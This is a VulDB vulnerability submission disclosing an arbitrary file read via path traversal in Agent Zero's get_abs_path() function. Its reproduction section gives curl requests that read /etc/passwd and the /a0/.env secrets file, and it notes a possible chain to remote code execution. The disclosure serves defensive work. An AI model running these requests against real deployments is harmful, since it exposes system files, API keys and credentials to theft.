Enviar #771967: frdel agent-zero 0.9.7-10 Path Traversal (CWE-22)información

Títulofrdel agent-zero 0.9.7-10 Path Traversal (CWE-22)
Descripción# Technical Details An Arbitrary File Read via Path Traversal vulnerability exists in the `get_abs_path()` function in `python/helpers/files.py` of Agent Zero. The application fails to validate that user-supplied file paths remain within the intended workspace directory. Python's `os.path.join()` discards all previous path components when given an absolute path, allowing attackers to escape the workspace directory. # Vulnerable Code File: python/helpers/files.py (get_abs_path function) Method: get_abs_path(*relative_paths) -> os.path.join(get_base_dir(), *relative_paths) Why: os.path.join("/workspace", "/etc/passwd") returns "/etc/passwd", completely ignoring the base directory. Endpoint: python/api/download_work_dir_file.py Flow: GET /download_work_dir_file?path=/etc/passwd -> file_info.get_file_info("/etc/passwd") -> files.get_abs_path("/etc/passwd") -> returns "/etc/passwd" # Reproduction 1. Start Agent Zero: docker run -d -p 50001:80 agent0ai/agent-zero:latest 2. Get CSRF token: curl -s -c /tmp/cookies.txt "http://localhost:50001/csrf_token" 3. Read /etc/passwd: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/etc/passwd" 4. Read secrets: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/a0/.env" # Impact - Arbitrary file read (system files, SSH keys, cloud credentials) - Exfiltration of API keys and secrets from /a0/.env - Chain with leaked A0_PERSISTENT_RUNTIME_ID for authentication bypass and RCE
Fuente⚠️ https://gist.github.com/YLChen-007/1819c843ad26aaaaecdc768a789df022
Usuario
 Eric-y (UID 95889)
Sumisión2026-03-05 03:23 (hace 1 mes)
Moderación2026-03-16 22:32 (12 days later)
EstadoAceptado
Entrada de VulDB351337 [frdel/agent0ai agent-zero 0.9.7-10 python/helpers/files.py get_abs_path recorrido de directorios]
Puntos20

AnteriorVisión De ConjuntoPróximo